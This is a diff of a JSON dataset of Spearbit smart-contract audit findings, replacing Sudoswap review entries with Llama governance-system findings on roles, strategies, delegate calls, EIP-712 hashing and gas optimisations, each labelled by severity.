nftIds,...) ... { ... //There is a check on the number of requested `NFT`s require( (nftIds.length > 0) && (nftIds.length <= _nft.balanceOf(address(this))), \"Must ask for > 0 and < balanceOf NFTs\"); // check is present ... ,! ,! }", + "title": "Role, permission, strategy, and guard management or config errors may prevent creating/approving/queuing/executing actions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "LlamaCore deployment from the factory will only succeed if one of the roles is the BOOTSTRAP_ROLE. As the comments note: // There must be at least one role holder with role ID of 1, since that role ID is initially // given permission to call `setRolePermission`. This is required to reduce the chance that an // instance is deployed with an invalid configuration that results in the instance being unusable. // Role ID 1 is referred to as the bootstrap role. There are still several ways a user can misstep and lose access to LlamaCore. Bootstrap Role Scenarios While the bootstrap role is still needed: 1. Setting an expiry on the bootstrap role's policyholder RoleHolderData and allowing the timestamp to pass. Once passed any caller may remove the BOOTSTRAP_ROLE from expired policyholders. 2. Removing the BOOTSTRAP_ROLE from all policyholders. 3. Revoking the role's permission with setRolePermission(BOOTSTRAP_ROLE, bootstrapPermissionId, false). General Roles and Permissions Similarly, users may allow other permissions to expire, or remove/revoke them, which can leave the contract in a state where no permissions exist to interact with it. The BOOTSTRAP_- ROLE would need to be revoked or otherwise out of use for this to be a problem. Misconfigured Strategies A misconfigured strategy may also result in the inability to process new actions. For example: 1. Setting minApprovals too high. 2. Setting queuingPeriod unreasonably high 3. Calling revokePolicy when doing so would make policy.getRoleSupplyAsQuantitySum(approvalRole) fall below minApprovals (or fall below minApprovals - actionCreatorApprovalRoleQty). 1 & 2 but applied to disapprovals. And more, depending on the strategy (e.g. if a strategy always responded true to isActive). Removal of Strategies It should not be possible to remove the last strategy of a Llama instance It is possible to remove all strategies from an Ilama instance. It would not be possible to create a new action afterward. An action is required to add other strategies back. As a result, the instance would become unusable, and access to funds locked in the Accounts would be lost. Misconfigured Guards An accidentally overly aggressive guard could block all transactions. There is a built-in protection to prevent guards from getting in the way of basic management if (target == address(this) || target == address(policy)) revert CannotUseCoreOrPolicy();. Again, the BOOTSTRAP_ROLE would need to be revoked or otherwise out of use for this to be a problem.", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Low Risk 22" + "Llama", + "Severity: Medium Risk" ] }, { - "title": "Avoid utilizing inside knowledge of functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "ETH based swap functions use isRouter==false and router- Caller==address(0) as parameters to swapTokenForAnyNFTs() and swapToken- ForSpecificNFTs(). These parameters end up in _validateTokenInput(). The LSSVMPairETH version of this function does not use those parameters, so it is not a problem at this point. However, the call actually originates from the Router so functionally isRouter should be true. Our concern is that using inside knowledge of the functions might potentially introduce subtle issues in the following scenarios: 24 function robustSwapETHForAnyNFTs(...) ... { ... remainingValue -= swapList[i].pair.swapTokenForAnyNFTs{value: pairCost}(swapList[i].numItems, nftRecipient, false, address(0)); ... ,! } function robustSwapETHForSpecificNFTs(...) ... { ... remainingValue -= swapList[i].pair.swapTokenForSpecificNFTs{value: pairCost}(swapList[i].nftIds, nftRecipient, false, address(0)); ... ,! } function _swapETHForAnyNFTs(...) ... { ... remainingValue -= swapList[i].pair.swapTokenForAnyNFTs{value: pairCost}(swapList[i].numItems, nftRecipient, false, address(0)); ... ,! } function _swapETHForSpecificNFTs(...) ... { ... remainingValue -= swapList[i].pair.swapTokenForSpecificNFTs{value: ,! pairCost}(swapList[i].nftIds, nftRecipient, false, address(0)); ... } function swapTokenForAnyNFTs(..., bool isRouter, address routerCaller) ... { ... _validateTokenInput(inputAmount, isRouter, routerCaller, _factory); ... } function swapTokenForSpecificNFTs(..., bool isRouter, address routerCaller) ... { ... _validateTokenInput(inputAmount, isRouter, routerCaller, _factory); ... ,! } abstract contract LSSVMPairETH is LSSVMPair { function _validateTokenInput(..., bool, /*isRouter*/ /*routerCaller*/ ... ) { address, // doesn't use isRouter and routerCaller } ,! }", + "title": "LlamaPolicy.hasRole doesn't check if a policyholder holds a token", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "Incorrect usage of the revokePolicy function can result in a case, where the token of a policyholder is already burned but still holds a role. The hasRole function doesn't check if in addition to the role the policyholder still holds the token to be active. The role could still be used in the Llama system.", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Low Risk" + "Llama", + "Severity: Medium Risk" ] }, { - "title": "Add Reentrancy Guards", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "The abovementioned permalinks and corresponding functions are listed for Sudoswaps consideration to introduce reentrancy guard modiers. Currently, there is only one function that uses a reentrancy guard modier: withdrawAllETH() in LSSVMPairETH.sol#L94. Other functions in the codebase may also require reentrancy guard modiers. We have only seen reentrancy problems when malicious routers, assetRecip- ients, curves, factory owner or protocolFeeRecipient are involved. Despite normal prohibitions on this occurence, it is better to protect ones codebase than regret leaving open vulnerabilities available for potential attackers. There are three categories of functions that Sudoswap should consider applying reen- trancy guard modiers to: functions withdrawing ETH, functions sending ETH, and uses of safeTransferFrom() to external addresses (which will trigger an onERC1155Received() callback to receiving contracts). Examples of functions withdrawing ETH within LSSVM: LSSVMPairFactory.sol#L272 LSSVMPairETH.sol#L104 Instances of functions sending ETH within LSSVM: LSSVMPairETH.sol#L34 LSSVMPairETH.sol#L46 A couple of instances that use safeTransferFrom() to call external addresses, which will trigger an onERC1155Received() callback to receiving contracts: LSSVM- PairFactory.sol#L428 LSSVMRouter.sol#L544", + "title": "Incorrect isActionApproved behavior if new policyholders get added after the createAction in the same block.timestamp", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "Llama utilizes Checkpoints to store approval quantities per timestamp. If the current quantity changes, the previous values are preserved. The block.timestamp of createAction is used as a snapshot for the approval. (See: LlamaCore.sol#L597) Thus, in addition to the Checkpoints, the totalQuantity or numberOfHolders at the createAction are included in the snapshot. However, if new policyholders are added or their quantities change after the createAction within the same block.timestamp, they are not considered in the snapshot but remain eligible to cast an approval. For example, if there are four policyholders together 50% minimum approval: If a new action is created and two policyholders are added subsequently within the same block.timestamp. 9 The numberOfHolders would be 4 in the snapshot instead of 6. All 6 policyholders could participate in the approval, and two approvals would be sufficient instead of 4. Adding new policyholders together with creating a new action could happen easily in a llama script, which allows to bundle different actions. If a separate action is used to add a new policyholder, the final execution happens via a public callable function. An attacker could exploit this by trying to execute the add new policyholder action if a new action is created", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Low Risk" + "Llama", + "Severity: Medium Risk" ] }, { - "title": "Saving 1 byte off the constructor() code", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "The dup2 before the return in the code below indicates a possible optimization by rearranging the stack. function cloneETHPair(...) ... { assembly { ... | RETURNDATASIZE // 3d | PUSH1 runtime // 60 runtime | DUP1 // 80 // 60 creation | PUSH1 creation (c) // 3d // 39 | RETURNDATASIZE | CODECOPY ,! ,! ,! [0-2d]: runtime code // 81 | DUP2 [0-2d]: runtime code // f3 | RETURN [0-2d]: runtime code ... } } | 0 (r) | r 0 | r r 0 | c r r 0 | 0 c r r 0 | r 0 | 0 c 0 | 0 | | | | | | | |", + "title": "LlamaCore delegate calls can bring Llama into an unusable state", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "The core contract in Llama allows the execution of actions through a delegate_call. An action is executed as a delegate_call when the target is added as an authorizedScript. This enables batching multiple tasks into a contract, which can be executed as a single action. In the delegate_call, a script contract could modify arbitrary any slot of the core contract. The Llama team is aware of this fact and has added additional safety-checks to see if the slot0 has been modified by the delegate_call. The slot0 contains values that should never be allowed to change. bytes32 originalStorage = _readSlot0(); (success, result) = actionInfo.target.delegatecall(actionInfo.data); if (originalStorage != _readSlot0()) revert Slot0Changed(); A script might be intended to modify certain storage slots. However, incorrect SSTORE operations can completely break the contracts. For example, setting actionsCount = type(uint).max would prevent creating any new actions, and access to funds stored in the Account would be lost.", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Gas Optimization" + "Llama", + "Severity: Medium Risk" ] }, { - "title": "Decode extradata in calldata in one go", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "Spearbit discovered that the functions factory(), bondingCurve() and nft() are called independently but in most use cases all of the data is re- quired.", + "title": "The execution opcode of an action can be changed from call to delegate_call after approval", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "In Llama an action only defines the target address and the function which should be called. An action doesn't implicitly define if the opcode should be a call or a delegate_call. This only depends on whether the target address is added to authorizedScripts mapping. However, adding a target to the authorizedScripts can be done after the approval in a different action. The authorizedScript action could use a different set of signers with a different approval strategy. The change of adding a target to authorizedScript should not impact actions which are already approved and in the queuing state. This could lead to security issues when policyholders approved the action under the assumption the opcode will be a call instead of a delegate call.", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Gas Optimization" + "Llama", + "Severity: Medium Risk" ] }, { - "title": "Transfer last NFT instead of rst", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "When executing _sendAnyNFTsToRecipient() NFTs are retrieved by taking the rst available NFT and then sending it to nftRecipient. In (most) ERC721 implementations as well as in the EnumerableSet implementation, the array that stores the ownership is updated by swapping the last element with the selected element, to be able to shrink the array afterwards. When you always transfer the last NFT instead of the rst NFT, swapping isnt necessary so gas is saved. Code related to LSSVMPairEnumerable.sol: 29 abstract contract LSSVMPairEnumerable is LSSVMPair { function _sendAnyNFTsToRecipient(IERC721 _nft, address nftRecipient, uint256 numNFTs) internal override { ... for (uint256 i = 0; i < numNFTs; i++) { uint256 nftId = IERC721Enumerable(address(_nft)).tokenOfOwnerByIndex(address(this), 0); take the first NFT // _nft.safeTransferFrom(address(this), nftRecipient, nftId); // this calls _beforeTokenTransfer of ERC721Enumerable ,! ,! ,! ,! } } } abstract contract ERC721Enumerable is ERC721, IERC721Enumerable { function _beforeTokenTransfer(address from, address to, uint256 tokenId) internal virtual override { ,! ... _removeTokenFromOwnerEnumeration(from, tokenId); ... } function _removeTokenFromOwnerEnumeration(address from, uint256 tokenId) private { ... uint256 lastTokenIndex = ERC721.balanceOf(from) - 1; uint256 tokenIndex = _ownedTokensIndex[tokenId]; // When the token to delete is the last token, the swap operation is unnecessary ==> we can make use of this if (tokenIndex != lastTokenIndex) { uint256 lastTokenId = _ownedTokens[from][lastTokenIndex]; _ownedTokens[from][tokenIndex] = lastTokenId; // Move the last token to the slot of the to-delete token _ownedTokensIndex[lastTokenId] = tokenIndex; // Update the moved token's index } // This also deletes the contents at the last position of the array delete _ownedTokensIndex[tokenId]; delete _ownedTokens[from][lastTokenIndex]; ,! ,! ,! ,! } } Code related to LSSVMPairMissingEnumerable.sol: 30 abstract contract LSSVMPairMissingEnumerable is LSSVMPair { function _sendAnyNFTsToRecipient(IERC721 _nft, address nftRecipient, uint256 numNFTs) internal override { ,! ... for (uint256 i = 0; i < numNFTs; i++) { uint256 nftId = idSet.at(0); // take the first NFT _nft.safeTransferFrom(address(this), nftRecipient, nftId); idSet.remove(nftId); // finally calls _remove() } } } library EnumerableSet { function _remove(Set storage set, bytes32 value) private returns (bool) { ... uint256 toDeleteIndex = valueIndex - 1; uint256 lastIndex = set._values.length - 1; if (lastIndex != toDeleteIndex) { // ==> we can make use of this bytes32 lastvalue = set._values[lastIndex]; set._values[toDeleteIndex] = lastvalue; // Move the last value to the index where the value to delete is set._indexes[lastvalue] = valueIndex; // Replace lastvalue's index to valueIndex ,! ,! } set._values.pop(); delete set._indexes[value]; ... // Delete the slot where the moved value was stored // Delete the index for the deleted slot } }", + "title": "LlamaFactory is governed by Llama itself", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "Llama uses their own governance system to govern the LlamaFactory contract. The LlamaFactory contract is responsible for authorizing new LlamaStrategies. We can identify several potential drawbacks with this approach. If only a single strategy contract is used and a critical bug is discovered, the implications could be significant. In such a scenario, it would mean a broken strategy contract needs to be used by the Factory governance to deploy a fixed version of the strategy contract or enable other strategies. The likelihood for this to happen is still low but implications could be critical.", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Gas Optimization" + "Llama", + "Severity: Low Risk" ] }, { - "title": "Simplify the connection between Pair and Router", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "There are two ways to interact between Pair and Router: 1. LSSVMPairERC20.sol calls router.pairTransferERC20From, where the goal is to transfer ERC20 2. _swapNFTsForToken calls pair.cacheAssetRecipientNFTBalance and pa ir.routerSwapNFTsForToken, where the goal is to transfer NFTs Using two different patterns to solve the same problem makes the code more com- plex and larger than necessary. Patterns with cacheAssetRecipientNFTBa lance() are also error prone. abstract contract LSSVMPairERC20 is LSSVMPair { function _validateTokenInput(..., bool isRouter, ...) ... { ... if (isRouter) { LSSVMRouter router = LSSVMRouter(payable(msg.sender)); // Verify ,! if router is allowed require(_factory.routerAllowed(router), \"Not router\"); ... router.pairTransferERC20From( _token, routerCaller, _assetRecipient, inputAmount, pairVariant() ); ... } ... } } contract LSSVMRouter { function pairTransferERC20From(...) ... { // verify caller is a trusted pair contract require(factory.isPair(msg.sender, variant), \"Not pair\"); ... // transfer tokens to pair token.safeTransferFrom(from, to, amount); // transfer ERC20 from the original caller } ,! } 33 contract LSSVMRouter { function _swapNFTsForToken(...) ... { ... // Cache current asset recipient balance swapList[i].pair.cacheAssetRecipientNFTBalance(); ... for (uint256 j = 0; j < swapList[i].nftIds.length; j++) { ,! ,! nft.safeTransferFrom(msg.sender,assetRecipient,swapList[i].nftIds[j]); // transfer NFTs from the original caller } ... outputAmount += ,! swapList[i].pair.routerSwapNFTsForToken(tokenRecipient); ... } } abstract contract LSSVMPair is Ownable, ReentrancyGuard { function cacheAssetRecipientNFTBalance() external { require(factory().routerAllowed(LSSVMRouter(payable(msg.sender))),\"Not router\"); // Verify if router is allowed assetRecipientNFTBalanceAtTransferStart = nft().balanceOf(getAssetRecipient()) + 2; } ,! ,! }", + "title": "The permissionId doesn't include call or delegate-call for LlamaAccount.execute", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "The decision if LlamaAccount.execute is a delegate_call depends on the bool flag parameter withDelegatecall. This parameter is not included in the permissionId, which controls role permissions in Llama. The permissionId in Llama is calculated in the following way: PermissionData memory permission = PermissionData(target, bytes4(data), strategy); bytes32 permissionId = keccak256(abi.encode(permission)); The permissionId required for a role to perform an action only includes the function signature but not the param- eters themselves. It is impossible to define the opcode as part of the permissionId.", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Gas Optimization" + "Llama", + "Severity: Low Risk" ] }, { - "title": "Cache array length", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "An array length is frequently used in for loops. This value is an evaluation for every iteration of the loop. Assuming the arrays are regularly larger than 1, it saves some gas to store the array length in a temporary variable. The following snippets are samples of the above context for lines of code where this is relevant: LSSVMPairEnumerable.sol#L51 LSSVMPairFactory.sol#L378 LSSVMPairMissingEnumerable.sol#L57 LSSVMRouter.sol#L358 For more examples, please see the context above for exact lines where this applies. The following contains examples of the overusage of nftIds.length: 35 function swapTokenForSpecificNFTs(...) ... { ... require((nftIds.length > 0) && (nftIds.length <= _nft.balanceOf(address(this))),\"Must ask for > 0 and < balanceOf NFTs\"); ... (error, newSpotPrice, inputAmount, protocolFee) = _bondingCurve ,! .getBuyInfo( spotPrice, delta, nftIds.length, fee, _factory.protocolFeeMultiplier() ); ... }", + "title": "Nonconforming EIP-712 typehash", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "Incorrect strings used in computing the EIP-712 typehash. 1. The strings contain space( ) after comma(,) which is not standard EIP-712 behaviour. 2. ActionInfo is not used in typehash. There will be a mismatch when comparing to hashes produced by JS libs or solidity (if implemented), etc.. Not adhering to EIP-712 spec means wallets will not render correctly and any supporting tools will produce a different typehash.", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Gas Optimization" + "Llama", + "Severity: Low Risk" ] }, { - "title": "Use Custom Errors", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "Strings are used to encode error messages. With the current Solidity versions it is possible to replace them with custom errors, which are more gas efcient. Example of non-custom errors used in LSSVM : LSSVMRouter.sol#L604 require(block.timestamp <= deadline, \"Deadline passed\"); LSSVMRouter.sol#L788 require(outputAmount >= minOutput, \"outputAmount too low\"); Note: This pattern has been used in Ownable.sol#L6-L7", - "labels": [ - "Spearbit", - "Sudoswap", + "title": "Various events do not add the role as parameter", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "Note: During the audit, the client discovered an issue that affects their offchain infrastructure. Various events do not emit the role as parameter: 1. event ActionCreated(uint256 id, address indexed creator, ILlamaStrategy indexed strategy, address indexed target, uint256 value, bytes data, string description); 2. event ApprovalCast(uint256 id, address indexed policyholder, uint256 quantity, string reason); 3. event DisapprovalCast(uint256 id, address indexed policyholder, uint256 quantity, string reason);", + "labels": [ + "Spearbit", + "Llama", + "Severity: Low Risk" + ] + }, + { + "title": "LlamaCore doesn't check if minExecutionTime returned by strategy is in the past", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "The minExecutionTime returned by a strategy is not validated.", + "labels": [ + "Spearbit", + "Llama", + "Severity: Low Risk" + ] + }, + { + "title": "Address parsing from tokenId to address string does not account for leading 0s", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "Policy tokenIds are derived from the holder's account address. The address is intended to be displayed in the svg generated when calling tokenURI. Currently, leading 0s are truncated rendering the incorrect address string: e.g. 0x015b... vs 0x0000...be60 for address 0x0000000000015B23C7e20b0eA5eBd84c39dCbE60.", + "labels": [ + "Spearbit", + "Llama", + "Severity: Low Risk" + ] + }, + { + "title": "The ALL_HOLDERS_ROLE can be set as a force role by mistake", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "During the initialization, an array of roles that must be assigned as force approval/disapproval can be sent. The logic does not account for ALL_HOLDERS_ROLE (which is role id 0, the default value of uint8) which can be sent as a mistake by the user. This is a low issue as if the above scenario happens, the strategy can become obsolete which will render the owner redeploy the strategy with correct initialization configs. We must mention that the force roles can not be changed after they are set within the initialization.", + "labels": [ + "Spearbit", + "Llama", + "Severity: Low Risk" + ] + }, + { + "title": "LlamaPolicy.setRolePermission allows to set permissions for non existing roles", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "It is possible to set a permission for a role that doesn't exist, yet. In other functions like assigning a role to a policyholder, this check happens. (See: LlamaPolicy.sol#L343) A related issue, very close to this, is the updateRoleDescription method which can emit an event for a role that does not exists. This is just an informational issue as it does not affect with anything the on-chain logic, might affect off-chain logic if any logic will ever rely on it.", + "labels": [ + "Spearbit", + "Llama", + "Severity: Low Risk" + ] + }, + { + "title": "The RoleAssigned event in LlamaPolicy emits the currentRoleSupply instead of the quantity", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "During the audit, the client discovered an issue that affects their off-chain infrastructure. The RoleAssigned event in LlamaPolicy emits the currentRoleSupply instead of the quantity. From an off-chain perspective, there is currently no way to get the quantity assigned for a role to a policyholder at Role Assignment time. The event would be more useful if it emitted quantity instead of currentRoleSupply (since the latter can be just be calculated off-chain from the former).", + "labels": [ + "Spearbit", + "Llama", + "Severity: Low Risk" + ] + }, + { + "title": "ETH can remain in the contract if msg.value is greater than expected", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "When an action is created, the creator can specify an amount of ETH that needs to be sent when executing the transaction. This is necessary in order to forward ETH to a target call. Currently, when executing the action the msg.value is checked to be at least the required amount of ETH needed to be forwarded. if (msg.value < actionInfo.value) revert InsufficientMsgValue(); This can result in ETH remaining in the contract after the execution. From our point of view, LlamaCore should not hold any balance of ETH.", + "labels": [ + "Spearbit", + "Llama", + "Severity: Low Risk" + ] + }, + { + "title": "Cannot re-authorize an unauthorized strategy config", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "Strategies are deployed using a create2 salt. The salt is derived from the strategy config itself (see LlamaCore.sol#L709-L710). This means that any unauthorized strategy cannot be used in the future, even if a user decides to re-enable it.", + "labels": [ + "Spearbit", + "Llama", + "Severity: Low Risk" + ] + }, + { + "title": "Signed messages may not be cancelled", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "Creating, approving, and disapproving actions may all be done by signing a message and having another account call the relevant *BySig function. Currently, there is no way for a signed message to be revoked without a successful *BySig function call containing the nonce of the message to be revoked.", + "labels": [ + "Spearbit", + "Llama", + "Severity: Low Risk" + ] + }, + { + "title": "LlamaCore name open to squatting or impersonation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "When deploying a LlamaCore clone, the create2 salt is derived from the name. This means that no two may have the same name, and name squatting, or impersonation, may occur.", + "labels": [ + "Spearbit", + "Llama", + "Severity: Low Risk" + ] + }, + { + "title": "Expired policyholders are active until they are explicitly revoked", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "Each policyholder in Llama has an expiration timestamp. However, policyholder can still use the power of their role after the expiration has passed. The final revoke only happens after the public LlamaPolicy.revokeExpiredRole method is called. Anyone can call this method after the expiration timestamp is passed. For the Llama system to function effectively with role expiration, it is essential that external keepers vigilantly monitor the contract and promptly revoke expired roles. A final revoke exactly at the expiration can not be guaranteed.", + "labels": [ + "Spearbit", + "Llama", + "Severity: Low Risk" + ] + }, + { + "title": "Gas optimizations", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "Throughout the codebase we've identified gas improvements that were aggregated into one issue for a better management. RelativeStrategy.sol#L159 The if (disapprovalPolicySupply == 0) revert RoleHasZeroSupply(disapprovalRole); check and actionDisapprovalSupply[actionInfo.id] = disapprovalPolicySupply; can be wrapped in an if block in case disapprovals are enabled The uint128 newNumberOfHolders; and uint128 newTotalQuantity; variables are obsolete as the up- dates on the currentRoleSupply can be done in the if branches. LlamaPolicy.sol#L380-L392 The exists check is redundant LlamaPolicy.sol#L252 The _validateActionInfoHash(action.infoHash, actionInfo); is redundant as it's already done in the getActionState LlamaCore.sol#L292 LlamaCore.sol#L280 LlamaCore.sol#L672 Finding the BOOTSTRAP_ROLE in the LlamaFactory._deploy could happen by expecting the role at a cer- tain position like position 0 instead of paying gas for an on-chain search operation to iterate the array. LlamaFactory.sol#L205 quantityDiff calculation guaranteed to not overflow as the ternary checks initialQuantity > quantity before subtracting. Infeasible for numberOfHolders and totalQuantity to overflow. See also LlamaPolicy.sol#L422-L423 Infeasible for numberOfHolders to overflow.", + "labels": [ + "Spearbit", + "Llama", "Severity: Gas Optimization" ] }, { - "title": "Alternatives for the immutable Proxy variables", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "In the current LSSVMPairClone, the immutable variables stored in the proxy are sent along with every call. It may be possible to optimize this. 37", + "title": "Unused code", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "Various parts of the code is unused or unnecessary. CallReverted and MissingAdmin in LlamaPolicy.sol#L27-L29 DisapprovalThresholdNotMet in RelativeStrategy.sol#L28 Unused errors in LlamaCore.sol InvalidCancelation, ProhibitedByActionGuard, ProhibitedByStrategy, ProhibitedByStrategy(bytes32 reason) and RoleHasZeroSupply(uint8 role) /// - Action creators are not allowed to cast approvals or disapprovals on their own actions, The comment is inaccurate, this strategy, the creators have no restrictions on their actions. RelativeStrategy.sol#L19 17", "labels": [ "Spearbit", - "Sudoswap", + "Llama", "Severity: Gas Optimization" ] }, { - "title": "Pair implementations may not be Proxies", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "The security of function pairTransferERC20From() relies on is- Pair(). In turn, isPair() relies on both isETHPairClone() and isERC20PairClone(). These functions check that a valid proxy is used with a valid implementation ad- dress. However, if the implementation address itself is a proxy it could link to any other contract. In this case security could be undermined depending on the implementation details. This is not how the protocol is designed, but future developers or developers using a fork of the code might not be aware of this.", + "title": "Duplicate storage reads and external calls", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "When creating, approving, disapproving, queuing, and executing actions, there are calls between the various contracts in the system. Due to the external calls, the compiler will not cache storage reads, meaning the gas cost of warm sloads is incurred multiple times. The same is true for view function calls between the contracts. A number of these calls are returning the same value multiple times in a transaction.", "labels": [ "Spearbit", - "Sudoswap", + "Llama", + "Severity: Gas Optimization" + ] + }, + { + "title": "Consider clones-with-immutable-args", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "The cloned contracts have immutable values that are written to storage on initialization due to proxies being used. Reading from storage costs extra gas but also puts some of the storage values at risk of being overwritten when making delegate calls.", + "labels": [ + "Spearbit", + "Llama", + "Severity: Gas Optimization" + ] + }, + { + "title": "The domainSeperator may be cached", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "The domainSeperator is computed for each use. Some gas may be saved by using caching and deferring to the cached value.", + "labels": [ + "Spearbit", + "Llama", + "Severity: Gas Optimization" + ] + }, + { + "title": "Prefer on-chain SVGs or IPFS links over server links for contractURI", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "Llama uses on-chain SVG for LlamaPolicy.tokenURI. The same could be implemented for LlamaPolicy.contractURI as well. In general IPFS links or on-chain SVG for visual representations provide better properties than centralized server links.", + "labels": [ + "Spearbit", + "Llama", "Severity: Informational" ] }, { - "title": "NFT and Token Pools can be signed orders instead", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "Currently if any actor wants to create a buy/sell order they would have to create a new pool and pay gas for it. However, the advantage of this is unclear. TOKEN and NFT type pools can really be buy/sell orders at a price curve using signed data. This is reminiscent of how similar limit orders implemented by OpenSea, 1Inch, and SushiSwap currently function. Amending this in the codebase would make creating buy/sell orders free and should attract more liquidity and/or orders to Sudoswap.", + "title": "Consider making the delegate-call scripts functions only callable by delegate-call", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "An additional safety check could be added to scripts if a function should be only callable via a delegate-call.", "labels": [ "Spearbit", - "Sudoswap", + "Llama", "Severity: Informational" ] }, { - "title": "Remove Code Duplication", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "Functions like swapTokenForAnyNFTs and swapTokenForSpeci- ficNFTs are nearly identical and can be deduplicated by creating a common internal function. On the other hand this will slightly increase gas usage due to an extra jump.", + "title": "Missing tests for SingleUseScript.sol", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "There are no tests for SingleUseScript.sol in Llama.", "labels": [ "Spearbit", - "Sudoswap", + "Llama", "Severity: Informational" ] }, { - "title": "Unclear Function Name", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "The functions _validateTokenInput() of both LSSVMPairETH and LSSVMPairERC20 do not only validate the token input but also transfer ETH/ERC20. The function name does not reasonably imply this and therefore can create some confusion. 40 abstract contract LSSVMPairETH is LSSVMPair { function _validateTokenInput(...) ... { ... _assetRecipient.safeTransferETH(inputAmount); ... } } abstract contract LSSVMPairERC20 is LSSVMPair { function _validateTokenInput(...) ... { ... if (isRouter) { ... router.pairTransferERC20From(...); // transfer of tokens ... } else { // Transfer tokens directly _token.safeTransferFrom(msg.sender, _assetRecipient, inputAmount); } } }", + "title": "Role not available to Guards", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "Use cases where Guards require knowing the creation or approval role for the action are not sup- ported. ActionInfo does reference the strategy, and the two implemented strategies do have public functions referencing the approvalRole, allowing for a workaround. However, this is not mandated by the ILlamaStrategy interface and is not guaranteed to be present in future strategies.", "labels": [ "Spearbit", - "Sudoswap", + "Llama", "Severity: Informational" ] }, { - "title": "Inaccurate Message About MAX_FEE", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "The function initialize() of LSSVMPair has an error message containing less than 100%. This is likely an error and should probably be less than 90%, as in the changeFee() function and because MAX_FEE == 90%. 41 // 90%, must <= 1 - MAX_PROTOCOL_FEE (set in LSSVMPairFactory) uint256 internal constant MAX_FEE = 9e17; function initialize(..., uint256 